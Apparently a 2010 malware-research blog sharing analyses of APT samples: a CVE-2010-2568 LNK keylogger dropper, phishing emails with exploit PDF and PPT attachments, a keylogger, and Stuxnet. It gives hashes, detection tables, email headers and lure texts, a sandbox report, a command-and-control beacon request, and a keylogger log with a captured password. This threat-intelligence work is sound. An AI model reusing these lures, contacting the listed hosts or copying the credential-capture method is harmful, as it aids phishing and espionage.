Clicky

Pages

Friday, July 30, 2010

CVE-2010-2568 keylogger Win32/Chymine.A

 CVE-2010-2568 - Win32/Chymine.A 
Windows Shell in Microsoft Windows XP SP3, Server 2003 SP2, Vista SP1 and SP2, Server 2008 SP2 and R2, and Windows 7 allows local users or remote attackers to execute arbitrary code via a crafted (1) .LNK or (2) .PIF shortcut file, which is not properly handled during icon display in Windows Explorer, as demonstrated in the wild in July 2010, and originally reported for malware that leverages CVE-2010-2772 in Siemens WinCC SCADA systems

The credit for this post goes to Extraexploit from extraexploit.blogspot.com. See additional details on his blog




Download bin.exe as a password protected archive  (contact me if you need the password)



ESET New malicious LNKs: here we go…
"At the time of analysis, this threat downloads and install a key stroke logger which we detect as Win32/Spy.Agent.NSO trojan.  The server used to deliver the components used in this attack is presently located in the US, but the IP is assigned to a customer in China. "

F-Secure Win32/Chymine-A

Result: 30/41 (73.18%)
http://www.virustotal.com/analisis/96ec6dc227b3110807d1dd183e802aa4f1271f79cdeaa50e9172065fd5c311f2-1280489604
Antivirus Version Last Update Result
AhnLab-V3 2010.07.30.00 2010.07.29 Dropper/Win32.Chymine
AntiVir 8.2.4.32 2010.07.30 TR/Dldr.Tiny.cmq
Antiy-AVL 2.0.3.7 2010.07.30 Trojan/Win32.Tiny.gen
Avast 4.8.1351.0 2010.07.30 Win32:Malware-gen
Avast5 5.0.332.0 2010.07.30 Win32:Malware-gen
AVG 9.0.0.851 2010.07.30 PSW.Generic8.GRF
BitDefender 7.2 2010.07.30 Trojan.Autorun.ATB
Comodo 5586 2010.07.30 TrojWare.Win32.AntiAV.~G
DrWeb 5.0.2.03300 2010.07.30 Trojan.KeyLogger.8141
Emsisoft 5.0.0.34 2010.07.30 Trojan-Downloader.Win32.Tiny!IK
F-Secure 9.0.15370.0 2010.07.30 Trojan-Spy:W32/Chymine.A
Fortinet 4.1.143.0 2010.07.30 W32/Tiny.CMQ!tr.dldr
GData 21 2010.07.30 Trojan.Autorun.ATB
Ikarus T3.1.1.84.0 2010.07.30 Trojan-Downloader.Win32.Tiny
Jiangmin 13.0.900 2010.07.29 TrojanSpy.KeyLogger.cqyg
Kaspersky 7.0.0.125 2010.07.30 Trojan-Downloader.Win32.Tiny.cmq
McAfee 5.400.0.1158 2010.07.30 Generic Downloader.x!eas
McAfee-GW-Edition 2010.1 2010.07.30 Heuristic.BehavesLike.Win32.CodeInjection.H
Microsoft 1.6004 2010.07.30 Trojan:Win32/Chymine.A
NOD32 5325 2010.07.30 Win32/Spy.Agent.NSO
nProtect 2010-07-30.02 2010.07.30 Trojan.Autorun.ATB
Panda 10.0.2.7 2010.07.29 Trj/ChymineLNK.A
PCTools 7.0.3.5 2010.07.30 Net-Worm.SillyFDC
Rising 22.58.04.05 2010.07.30 Trojan.Win32.Generic.52214029
Sophos 4.56.0 2010.07.30 Mal/Chymin-A
Sunbelt 6663 2010.07.30 Trojan.Win32.Generic!BT
Symantec 20101.1.1.7 2010.07.30 W32.SillyFDC
VBA32 3.12.12.7 2010.07.30 Trojan-Downloader.Tiny.cmq
ViRobot 2010.7.30.3963 2010.07.30 Trojan.Win32.S.Downloader.131584
VirusBuster 5.0.27.0 2010.07.29 Trojan.DL.Tiny.DPT
Additional information
File size: 131584 bytes
MD5...: 3515b1f2ae991fcd64ff4e3b664625c0


Thursday, July 29, 2010

Jul 29 CVE-2010-0188 PDF Defense New Thinks


CVE-2010-0188 Unspecified vulnerability in Adobe Reader and Acrobat 8.x before 8.2.1 and 9.x before 9.3.1 allows attackers to cause a denial of service (application crash) or possibly execute arbitrary code via unknown vectors



Download  5e0e5951ca4626a891344e38e0085d58 Defense_Attache.pdf  as a password protected archive (please contact me for the password if you need it)





From: Gillian Medina [mailto:gillianmedina@hotmail.com]
Sent: Thursday, July 29, 2010 4:31 AM
To: randolph.strong@us.army.mil
Subject: Defense New Thinks

Defense New Thinks 


  File Defense_Attache.pdf received on 2010.08.02 03:25:36 (UTC)
http://www.virustotal.com/analisis/c6a606ebb758ed5f7e552019d656dab7cda723617819f583ceef797cfc9cfbf5-1280719536
Result: 11/42 (26.2%)
Antiy-AVL    2.0.3.7    2010.08.02    Exploit/Win32.Pidief
Avast    4.8.1351.0    2010.08.02    PDF:CVE-2010-0188
Avast5    5.0.332.0    2010.08.02    PDF:CVE-2010-0188
DrWeb    5.0.2.03300    2010.08.02    Exploit.PDF.1046
eTrust-Vet    36.1.7753    2010.07.31    PDF/CVE-2010-0188!exploit
GData    21    2010.08.02    PDF:CVE-2010-0188
Ikarus    T3.1.1.84.0    2010.08.02    Exploit.Win32.Pidief
Kaspersky    7.0.0.125    2010.08.02    Exploit.Win32.Pidief.dci
McAfee-GW-Edition    2010.1    2010.08.01    Heuristic.BehavesLike.PDF.Suspicious.L
NOD32    5331    2010.08.01    a variant of PDF/CVE-2010-0188
Sophos    4.56.0    2010.08.02    Troj/PDFJs-II
Additional information
File size: 73708 bytes
MD5...: 5e0e5951ca4626a891344e38e0085d58


Headers
Received: from SNT133-W12 ([65.55.90.71]) by snt0-omc2-s32.snt0.hotmail.com with Microsoft SMTPSVC(6.0.3790.4675);
     Thu, 29 Jul 2010 01:31:18 -0700
Message-ID:
Return-Path: gillianmedina@hotmail.com
Content-Type: multipart/mixed;
    boundary="_e55064e7-b368-4f85-ab6f-7c8fd62fce86_"
X-Originating-IP: [113.225.75.65]
From: Gillian Medina
To:
Subject: Defense New Thinks
Date: Thu, 29 Jul 2010 01:31:18 -0700
Importance: Normal
MIME-Version: 1.0
X-OriginalArrivalTime: 29 Jul 2010 08:31:18.0425 (UTC) FILETIME=[6A87E890:01CB2EF8]

Hostname:    113.225.75.65
ISP:    China Unicom Liaoning province network
Organization:    China Unicom Liaoning province network
Type:    Broadband
Assignment:    Static IP
State/Region:    Liaoning
City:    Shenyang

This IP is on many blacklists http://www.robtex.com/ip/113.225.75.65.html#blacklists


Wednesday, July 28, 2010

Jul 28 CVE-2009-4324 PDF 990729 Summary of Network Intelligence from ljw@gsn.gov.tw 210.69.115.235


 Download 738af108a6edd46536492b1782589a04 -990729.pdf as a password protected archive (contact me if you need the password)



From: ljw [mailto:ljw@gsn.gov.tw]
Sent: Wednesday, July 28, 2010 11:24 PM
To: agefr6nt@yahoo.com.tw
Subject: 990729網情彙編

 From: ljw [mailto: ljw@gsn.gov.tw]Sent: Wednesday, July 28, 2010 11:24 PMTo: agefr6nt@yahoo.com.twSubject: 990729  Summary of Network Intelligence

Headers

Received: from mail2000.tccg.gov.tw (HELO mail2000.tccg.gov.tw) (210.69.115.235)
  by XXXXXXXXXXXXX
Received: from 192.168.4.154
    by mail2000.tccg.gov.tw with Mail2000 ESMTP Server V4.00S(4662:0:AUTH_LOGIN)
    (envelope-from ); Thu, 29 Jul 2010 17:28:08 +0800 (CST)
Return-Path:
Message-ID: <1975e5623c$23fce32a$0ae1d8b4@nccu212af2ce2>
From: "ljw"
To: ,
BCC:XXXXXXXXXXX
Subject: =?big5?B?OTkwNzI5uvSxobdKvXM=?=
Date: Thu, 29 Jul 2010 11:24:22 +0800
MIME-Version: 1.0
Content-Type: multipart/mixed;
    boundary="----=_NextPart_000_0033_01CB2F10.990CB480"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2900.3138
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.5579
 (210.69.115.235)
Hostname:    mail2000.tccg.gov.tw
ISP:    GSN, Taiwan Government Service Network.
Organization:    Taichung City Government
Country:    Taiwan


File name:
http://www.virustotal.com/file-scan/report.html?id=c1d9cd02799bbb45aa6a37a16f2da1dca86f55e474b0a33e0034232c176b5f99-1280460987
-990729.pdf
Submission date:
2010-07-30 05:36:27 (UTC)
12 /42 (28.6%)
Authentium     5.2.0.5     2010.07.30     JS/Pdfka.V
Avast     4.8.1351.0     2010.07.30     JS:Pdfka-gen
Avast5     5.0.332.0     2010.07.30     JS:Pdfka-gen
AVG     9.0.0.851     2010.07.29     Exploit.PDF
BitDefender     7.2     2010.07.30     Exploit.PDF-JS.Gen
eTrust-Vet     36.1.7750     2010.07.30     PDF/CVE-2010-1297.B!exploit  - NOT
F-Prot     4.6.1.107     2010.07.30     JS/Pdfka.V
F-Secure     9.0.15370.0     2010.07.30     Exploit.PDF-JS.Gen
GData     21     2010.07.30     Exploit.PDF-JS.Gen
McAfee-GW-Edition     2010.1     2010.07.29     Heuristic.BehavesLike.PDF.Suspicious.O
Norman     6.05.11     2010.07.29     JS/Shellcode.IZ
nProtect     2010-07-30.01     2010.07.30     Exploit.PDF-JS.Gen
Additional information
Show all
MD5   : 738af108a6edd46536492b1782589a04

==============================================================
Windows XP SP2 Adobe Reader 9.1

Files created
%tmp%\jqc.exe
%tmp%\1,pdf 

1.pdf
http://www.virustotal.com/file-scan/report.html?id=26a0711f9cb1dc0d53e524ed9b90f3356c8e5c4c4b6da942d8371662e800fcd5-1282796454


jqc.exe
http://www.virustotal.com/file-scan/report.html?id=7224943665fb630f371aeef1f8d6402ce4e53150c1fd8ff044977c659b514fdd-1282796115
AntiVir 8.2.4.38 2010.08.25 BDS/Ixeshe.A.20
Authentium 5.2.0.5 2010.08.26 W32/Heuristic-245!Eldorado
Avast 4.8.1351.0 2010.08.25 Win32:Rootkit-gen
Avast5 5.0.594.0 2010.08.25 Win32:Rootkit-gen
BitDefender 7.2 2010.08.26 Trojan.Generic.4549982
CAT-QuickHeal 11.00 2010.08.24 Backdoor.Ixeshe.a
ClamAV 0.96.2.0-git 2010.08.26 PUA.Packed.ASPack
Emsisoft 5.0.0.37 2010.08.26 Backdoor.Win32.Ixeshe!IK
F-Prot 4.6.1.107 2010.08.26 W32/Heuristic-245!Eldorado
F-Secure 9.0.15370.0 2010.08.26 Trojan.Generic.4549982
Fortinet 4.1.143.0 2010.08.25 W32/PdfExDr.B!tr
GData 21 2010.08.26 Trojan.Generic.4549982
Ikarus T3.1.1.88.0 2010.08.26 Backdoor.Win32.Ixeshe
Microsoft 1.6103 2010.08.25 Backdoor:Win32/Ixeshe.A
NOD32 5397 2010.08.25 probably a variant of Win32/Ixeshe.A
nProtect 2010-08-25.02 2010.08.25 Trojan.Generic.4549982
Panda 10.0.2.7 2010.08.25 Trj/CI.A
PCTools 7.0.3.5 2010.08.26 Trojan.Gen
Sophos 4.56.0 2010.08.26 Mal/PdfExDr-B
Sunbelt 6795 2010.08.26 Trojan.Win32.Generic!BT
Symantec 20101.1.1.7 2010.08.26 Trojan.Gen
TrendMicro 9.120.0.1004 2010.08.26 TSPY_AGENT.AVEP
TrendMicro-HouseCall 9.120.0.1004 2010.08.26 TSPY_AGENT.AVEP
VBA32 3.12.14.0 2010.08.25 Trojan-Downloader.Dreamtouch.xb
VirusBuster 5.0.27.0 2010.08.25 Trojan.Ixeshe.Z
Additional informationShow all 
MD5   : d27e5643f1e5422be6cba2d98506ebbf



120.126.54.189
Hostname:    ymu054-189.ym.edu.tw
ISP:    Ministry of Education Computer Center
Organization:    Ministry of Education Computer Center
Country:    Taiwan

  • Outgoing Connections





    • HTTP Data





      • Method: GET
      • Url: 120.126.54.189/AWS7838.jsp?2al314Le1g0315QgjaZ/I5Rojs9Khs9fI/xoIOmM=k+ojnhT
      • HTTP Version: HTTP/1.1



        • Header Data




          • x_bigfix_client_string: 2al314Le1g0315QgjaZ/qDAA
          • User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
          • Host: oltnsck.dnsrd.com
          • Connection: Keep-Alive

 http://www.robtex.com/dns/oltnsck.dnsrd.com.html

oltnsck.dnsrd.com

Incoming mail for oltnsck.dnsrd.com is handled by one mail server at dnsrd.com. Oltnsck.dnsrd.com has one IP number (120.126.34.94) , but the reverse is ymu034-094.ym.edu.tw.
Ymu034-094.ym.edu.tw point to the same IP. Oltnsck.dnsrd.com use this as a mail server.

dnsrd.com

Dnsrd.com is a domain controlled by three name servers at changeip.org. Two of them are on the same IP network. The primary name server is ns3.changeip.org. Incoming mail for dnsrd.com is handled by one mail server at changeip.com. Dnsrd.com has one IP number (204.16.173.30).

More information

oltnsck.dnsrd.com is hosted on a server in Taiwan


Transport Protocol: TCP
Remote Address: 140.112.155.252
Remote Port: 80
Protocol: HTTP
Connection Established: 0
Socket: 2020


Hostname:    140.112.155.252
ISP:    National Taiwan University
    Organization:    National Taiwan University
    Country:    Taiwan

Tuesday, July 27, 2010

APT Activity Monitor / keylogger

Here is a small piece of APT type malware, which records all user activities and keystrokes, including passwords. The attacker needs to execute it and it will create a hidden folder in the same directory named mssvr and a text log file called Updaterinfo.dat. The log can be sent or downloaded later using other means (look for a file named send1.exe, for example  - never mind, send1.exe does not appear to have any sending abilities). There are usually many other files associated with the attack - backdoors, misc installers, command interpreters, etc.  The Anubis report is brief and clear - see it posted below in full. The binary and mssvr folder can be anywhere, in some temp folder, for example.
 
mssvr 
mssvr\UpdaterInfo.dat ]

Fixed the archive, re-download it if you could not open it before
Download  dc281590aa9153000e983622f0559ea1 Adobeinfo.exe  ac as a password protected archive (please contact me for the password if you need it)
Two name variants known (but there can be an endless list) are Adobeinfo.exe and lognoreg.exe.

VT
http://www.virustotal.com/analisis/459441e13e339640e0c34530a9b5dcdf959c573f638258073882756d90b8e612-1280034705
 File AdobeInfo.exe received on 2010.07.25 05:11:45 (UTC)
Current status: finished
Result: 0/42 (0.00%)
Additional information
File size: 16384 bytes
MD5   : dc281590aa9153000e983622f0559ea1


Example of a log UpdaterInfo.dat in mssvr folder, note the way passwords are captured - in the bottom of this log.

--- 20100727 13:07:47 ----------------
11:06:47 The Active Windows Title: PC21330
11:06:03 The Active Windows Title: Inbox - Microsoft Outlook
11:06:05 The Active Windows Title: RE: Meeting tomorrow : Budget 2011- Message (HTML)
Let's meet before the meeting, maybe around 3 pm today. By the way I am still waiting for Brian's reply, he never called me back, do you have his secretary's number?

11:06:48 The Active Windows Title: Microsoft Access - Events_Records : Database (Access 2000 file format)
I will send you the agenda in a minute
11:06:55 The Active Windows Title: Find and Replace
[CTRL]f
July 23
11:06:07 The Active Windows Title: Find and Replace
....
12:06:37 The Active Windows Title: Microsoft Excel - InvitationListDetails.xlsx
12:06:06 The Active Windows Title: Microsoft Excel - invoicelist.xlsx
12:06:10 The Active Windows Title: Microsoft Excel - invoicelist.xlsx.xlsx
$16,000
 item
.....
12:06:11 The Active Windows Title: Save As
12:06:15 The Active Windows Title: Microsoft Excel - InvidtationListDetails
12:06:56 The Active Windows Title: \\FILESRV002\DATA\DEPARTMENTS\STRATCMD-S
[CTRL]c.xlsx
12:06:27 The Active Windows Title: Windows Internet Explorer
Taxi 20006
12:06:52 The Active Windows Title: taxi phone number zip code 20001 - Google Search - Microsoft Internet Explorer
12:06:04 The Active Windows Title: @@To Do list - Microsoft Outlook
oil production
12:06:10 The Active Windows Title: Untitled - Message (Plain Text)
12:06:16 The Active Windows Title: Amanda Smith
Jenn
12:06:56 The Active Windows Title: Untitled - Message (Plain Text)
15:06:36 The Active Windows Title: Google - Microsoft Internet Explorer
https://mail.acme.com
AJohnson
Summer2010WorldCup$$

Or this is from a VM


Some strings

GetModuleHandleA
GetStartupInfoA
[Up]
[Num Lock]
[Down]
[Right]
[UP]
[Left]
[PageDown]
[End]
[Del]
[PageUp]
[Home]
[Insert]
[Scroll Lock]
[Print Screen]
[WIN]
[CTRL]
[TAB]
[F12]
[F11]
[F10]
[F9]
[F8]
[F7]
[F6]
[F5]
[F4]
[F3]
[F2]
[F1]
[ESC]
---- %04d%02d%02d %02d:%02d:%02d ----------------
\UpdaterInfo.dat
\mssvr
The Active Windows Title: %s
%02d:%02d:%02d
%s
%s

Unicode Strings:



Anubis Report
http://anubis.iseclab.org/?action=result&task_id=110a3a724ca9ad1e4250755391cf1e4bf

[#############################################################################]
    2. AdobeInfo..exe
[#############################################################################]
[=============================================================================]
    General information about this executable
[=============================================================================]
        Analysis Reason: Primary Analysis Subject
        Filename:        AdobeInfo..exe
        MD5:             dc281590aa9153000e983622f0559ea1
        SHA-1:           9945f8bf55a81b0e201fad167577d49b37079bd4
        File Size:       16384 Bytes
        Command Line:    "C:\AdobeInfo..exe" 
        Process-status
        at analysis end: alive
        Exit Code:       0

[=============================================================================]
    Load-time Dlls
[=============================================================================]
        Module Name: [ C:\WINDOWS\system32\ntdll.dll ],
               Base Address: [0x7C900000 ], Size: [0x000AF000 ]
        Module Name: [ C:\WINDOWS\system32\kernel32.dll ],
               Base Address: [0x7C800000 ], Size: [0x000F6000 ]
        Module Name: [ C:\WINDOWS\system32\USER32.dll ],
               Base Address: [0x7E410000 ], Size: [0x00091000 ]
        Module Name: [ C:\WINDOWS\system32\GDI32.dll ],
               Base Address: [0x77F10000 ], Size: [0x00049000 ]
        Module Name: [ C:\WINDOWS\system32\MSVCRT.dll ],
               Base Address: [0x77C10000 ], Size: [0x00058000 ]

[=============================================================================]
    2.a) AdobeInfo..exe - Registry Activities
[=============================================================================]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
    Registry Values Read:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
        Key: [ HKLM\System\CurrentControlSet\Control\Terminal Server ], 
             Value Name: [ TSAppCompat ], Value: [ 0 ], 2 times


[=============================================================================]
    2.b) AdobeInfo..exe - File Activities
[=============================================================================]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
    Files Created:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
        File Name: [ C:\mssvr ]
        File Name: [ C:\mssvr\UpdaterInfo.dat ]

[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
    Files Read:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
        File Name: [ C:\mssvr\UpdaterInfo.dat ]

[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
    Files Modified:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
        File Name: [ C:\mssvr\UpdaterInfo.dat ]

[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
    Directories Created:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
        Directory: [ C:\\mssvr ]

[=============================================================================]
    2.c) AdobeInfo..exe - Other Activities
[=============================================================================]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
    Keyboard Keys Monitored:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
        Virtual Key Code: [ VK_SHIFT (16) ], 70585 times
        Virtual Key Code: [ VK_BACK (8) ], 743 times
        Virtual Key Code: [ VK_RETURN (13) ], 743 times
        Virtual Key Code: [ VK_ESCAPE (27) ], 743 times
        Virtual Key Code: [ VK_F1 (112) ], 743 times
        Virtual Key Code: [ VK_F2 (113) ], 743 times
        Virtual Key Code: [ VK_F3 (114) ], 743 times
        Virtual Key Code: [ VK_F4 (115) ], 743 times
        Virtual Key Code: [ VK_F5 (116) ], 743 times
        Virtual Key Code: [ VK_F6 (117) ], 743 times
        Virtual Key Code: [ VK_F7 (118) ], 743 times
        Virtual Key Code: [ VK_F8 (119) ], 743 times
        Virtual Key Code: [ VK_F9 (120) ], 743 times
        Virtual Key Code: [ VK_F10 (121) ], 743 times
        Virtual Key Code: [ VK_F11 (122) ], 743 times
        Virtual Key Code: [ VK_F12 (123) ], 743 times
        Virtual Key Code: [ VK_OEM_3 (192) ], 743 times
        Virtual Key Code: [ VK_1 (49) ], 743 times
        Virtual Key Code: [ VK_2 (50) ], 743 times 



Saturday, July 24, 2010

Advanced Persistent Threat / Targeted Attacks / APT Malware links

Here is a collection of links about  Advanced Persistent Threat malware and attacks. I think I missed a few hundred, please send more. thanks, Mila

General
Specific malware families and trojans
Stuxnet, Duqu, Flame, Gauss ..

OLD(ER) 2010 and before

Shadowserver
SHADOWS IN THE CLOUD: Investigating Cyber Espionage 2.0 Report
Shadows in the Cloud: An investigation into cyber espionage 2.0
Cyber Espionage: Death by 1000 Cuts

Raytheon
The Advanced Persistent Threat (or Informatonized Force Operatons) Michael K. Daly



























Mandiant
Combat the APT by Sharing Indicators of Compromise
Malware Behaving Badly: Preview

Blackhat Europe, State Of Malware: Family Ties

Advanced Persistent Threat Report







Symantec
The Hackers Behind Stuxnet  Patrick Fitzgerald

SANS computer forensics
Security Intelligence: Introduction (pt 1)
Security Intelligence: Introduction (pt 2)
Security Intelligence: Attacking the Kill Chain
Security Intelligence: Defining APT Campaigns

Digital Bond
Trojan Targeting Siemens and APT Thoughts  Dale Peterson

Threatchaos.com   IT--Harvest
35 Steps to Protect Yourself from Cyber Espionage Richard Stiennon

Project Grey Goose
Project Grey Goose: Phase I ReportProject Grey Goose Phase II Report: The evolving state of cyber warfare

Information Security
Understanding the advanced persistent threat Richard Bejtlich 

HBGary, Inc.
Advanced Persistent Threat What APT Means to Your Enterprise Greg Hoglund

Cassandra Security
All Advanced Persistent Threat articles

Netwitness
All Advanced Persistent Threat articles 

Google
A new approach to China 

TaoSecurity
You Down with APT? Richard Bejtlich
All Advanced Persistent Threat articles

Johnny Cocaine Internet Cowboy
Losing the cyberwar

MadMark's Blog
Google / Adobe Hacking Event Follow-up – APT Malware

ViCheck Malware Trends
APT Malware Trends

RiskPundit
Advanced Persistent Threat (APT)

Infowar Monitor
All Articles about espionage


Threatpost
Lab Matters: Inside Targeted Attacks

Threatexpert
Trojan Hydraq exposed

c-APT-ure
c-apt-ure.blogspot.com


 

Wednesday, July 21, 2010

Jul 15 CVE-2009-0556 PPT North Korean Nuclear Update from david.alton33@hotmail.com


Download  Nuclear_report.pps 71803d893ed7d052fdb58f10da200fe9 as a password protected archive (contact me if you need the password)

From: David Alton [mailto:david.alton33@hotmail.com]
Sent: Thursday, July 15, 2010 4:03 AM
To: xxxxxxxxxx
Subject: North Korean Nuclear Update.

 
Recently U.S Secretary of State Hillary Clinton has said North
Korea as many as six nuclear weapons.
 
Attached please find Koreatimes`s article about North Korea`s
Nuclear issue...   I believe it could be of your interest and helpful for reviewing
the NK Nuclear activities.
 ___________________________________
Your E-mail and More On-the-Go. Get Windows Live Hotmail Free. Sign up now.

 File Nuclear_report.pps received on 2010.07.21 11:33:22 (UTC)
http://www.virustotal.com/analisis/3bb1d1d441ab7412ca429ec2db6dbcf48e2b19323bf589d37698e76dc305044f-1279712002
Result: 11/42 (26.2%)
BitDefender    7.2    2010.07.21    Exploit.PPT.Gen
Emsisoft    5.0.0.34    2010.07.21    Exploit.MSPPoint.Agent!IK
F-Secure    9.0.15370.0    2010.07.21    Exploit.PPT.Gen
GData    21    2010.07.21    Exploit.PPT.Gen
Ikarus    T3.1.1.84.0    2010.07.21    Exploit.MSPPoint.Agent
Kaspersky    7.0.0.125    2010.07.21    Exploit.MSPPoint.Agent.x
McAfee-GW-Edition    2010.1    2010.07.21    Heuristic.BehavesLike.Exploit.P97.CodeExec.PGPG
Norman    6.05.11    2010.07.20    ShellCode.D
nProtect    2010-07-21.01    2010.07.21    Exploit.PPT.Gen
Sophos    4.55.0    2010.07.21    Troj/ExpPPT-A
TrendMicro-HouseCall    9.120.0.1004    2010.07.21    HEUR_OLEXP.B
Additional information
File size: 838144 bytes
MD5...: 71803d893ed7d052fdb58f10da200fe9

Headers
X-Originating-IP: [119.247.93.218]
From: David Alton
To: xxxxxxxxxxxx
Subject: North Korean Nuclear Update.
Date: Thu, 15 Jul 2010 20:03:21 +1200
Importance: Normal
MIME-Version: 1.0
X-OriginalArrivalTime: 15 Jul 2010 08:03:21.0286 (UTC) FILETIME=[31184E60:01CB23F4]

Hostname:    119247093218.ctinets.com
ISP:    City Telecom (H.K.) Ltd.
Organization:    City Telecom (H.K.) Ltd.
Type:    Broadband
Assignment:    Static IP
Country:    Hong Kong hk flag
City:    Tin Shui Wai
  

Sunday, July 18, 2010

CVE-2010-2568 (LNK vunerability) Zero Day Stuxnet-A Sample + PoC by Ivanlef0u + Links

CVE-2010-2568  -- Reserved --
Microsoft Security Advisory (2286198) Microsoft is investigating reports of limited, targeted attacks exploiting a vulnerability in Windows Shell, a component of Microsoft Windows. This advisory contains information about which versions of Windows are vulnerable as well as workarounds and mitigations for this issue.
The vulnerability exists because Windows incorrectly parses shortcuts in such a way that malicious code may be executed when the user clicks the displayed icon of a specially crafted shortcut. This vulnerability is most likely to be exploited through removable drives. For systems that have AutoPlay disabled, customers would need to manually browse to the root folder of the removable disk in order for the vulnerability to be exploited. For Windows 7 systems, AutoPlay functionality for removable disks is automatically disabled.

Download 74ddc49a7c121a61b8d06c03f92d0c13 Stuxnet-A ac as a password protected archive (please contact me for the password if you need it)


Collection of links (in no particular order)
  1. Ivanlef0u's Blog CVE-2010-2568 shorcut Lnk + PoC (Google translated to English)
  2. Exploitdb Microsoft Windows Automatic LNK Shortcut File Code Execution (PoC by Ivanf0u)
  3. Microsoft Security Advisory (2286198) Vulnerability in Windows Shell Could Allow Remote Code Execution
  4. Brian Krebs Experts Warn of New Windows Shortcut Flaw
  5. InReverse  About TmpHider/Stuxnet #1 by swirl
  6. Wilders Security Forums - Rootkit.TmpHider
  7. Microsoft Malware Protection Center - The Stuxnet Sting
  8. Microsoft Malware Protection Center - WinNT/Stuxnet.A
  9. Threatexpert - Win32/Stuxnet.A
  10. ESET (Windows) Shellshocked, Or Why Win32/Stuxnet Sux… by David Harley (with special thanks to Juraj Malcho, Aleksander Matrosov and their colleagues)
  11. Aleksander Matrosov http://twitpic.com/24z86b "Rootkit.TmpHider is signed with signature of Realtek Corp" http://bit.ly/a1BHaZ" /via @_MDL_ 
  12. Sophos Windows shortcut vulnerability with rootkit - detailed video demo 
  13. Mitigating .LNK Exploitation With Ariad — Didier Stevens 
  14. Internet Storm Center Vulnerability in Windows "LNK" files?  by Joel Esler and Bojan
  15. Windows zero-day attack works on all Windows systems by Chester Wisniewski
  16. Stuxnet is a directed attack -- 'hack of the century' by Ralph Langner (new)
 http://www.threatexpert.com/report.aspx?md5=74ddc49a7c121a61b8d06c03f92d0c13


 From Threatexpert
  * The following files were created in the system:
#    Filename(s)    File Size    File Hash    Alias
1     %Windir%\inf\mdmcpq3.PNF     6,623 bytes     

MD5: 0x0DD2AF5AFE93118073CB656D813435A4
SHA-1: 0x256AC5228427FCD03FB9EC1871B15FD76E4D0879     (not available)


2     %Windir%\inf\mdmeric3.PNF     90 bytes    

MD5: 0xB834EBEB777EA07FB6AAB6BF35CDF07F
SHA-1: 0xF7B86531AD78EB283E59091A1C64B0C47D50E6C6     (not available)


3     %Windir%\inf\oem6C.PNF     323,848 bytes    

MD5: 0xFA4381DF1F7F89077439A596630D5647
SHA-1: 0x152B6830777E7F2B214708A21BA28F9D625E5E16     (not available)


4     %Windir%\inf\oem7A.PNF     498,176 bytes     

MD5: 0xAD19FBAA55E8AD585A97BBCDDCDE59D4
SHA-1: 0xBCFCC25C6D0F58D784D5B5A4C631E920F655F50E     (not available)


5     %System%\drivers\mrxcls.sys     26,616 bytes    

MD5: 0xF8153747BAE8B4AE48837EE17172151E
SHA-1: 0xCB0793029C60C0BD059FF85DE956619F7FDEB4FD     Trojan:WinNT/Stuxnet.A [Microsoft]


6     %System%\drivers\mrxnet.sys     17,400 bytes     

MD5: 0xCC1DB5360109DE3B857654297D262CA1
SHA-1: 0x758240613C362BB1FD13E07D3D19F357B7F8A6DA     Trojan:WinNT/Stuxnet.B [Microsoft]


7     [file and pathname of the sample #1]     517,632 bytes    

MD5: 0x74DDC49A7C121A61B8D06C03F92D0C13
SHA-1: 0x0CCBC128DD8BF73DC7B3922FB67D26BBCDBCAA89     Trojan.Gen [PCTools]
Trojan.Gen [Symantec]
TrojanDropper:Win32/Stuxnet.A [Microsoft]


Virustotal
016169ebebf1cec2aad6c7f0d0ee9026  received on 2010.07.16 11:55:58 (UTC)
http://www.virustotal.com/analisis/743e16b3ef4d39fc11c5e8ec890dcd29f034a6eca51be4f7fca6e23e60dbd7a1-1279281358
Result: 25/41 (60.98%)
a-squared     5.0.0.31     2010.07.16     Trojan-Dropper.Win32.Stuxnet!IK
AhnLab-V3     2010.07.16.00     2010.07.15     Dropper/Win32.Stuxnet
AntiVir     8.2.4.12     2010.07.16     TR/Drop.Stuxnet.D
Avast     4.8.1351.0     2010.07.16     Win32:Trojan-gen
Avast5     5.0.332.0     2010.07.16     Win32:Trojan-gen
AVG     9.0.0.836     2010.07.16     SHeur3.XLI
BitDefender     7.2     2010.07.16     Win32.Worm.Stuxnet.A
Comodo     5446     2010.07.16     TrojWare.Win32.Rootkit.Stuxnet.a
DrWeb     5.0.2.03300     2010.07.16     Trojan.Stuxnet.1
F-Secure     9.0.15370.0     2010.07.16     Trojan.Agent.AQCK
GData     21     2010.07.16     Win32.Worm.Stuxnet.A
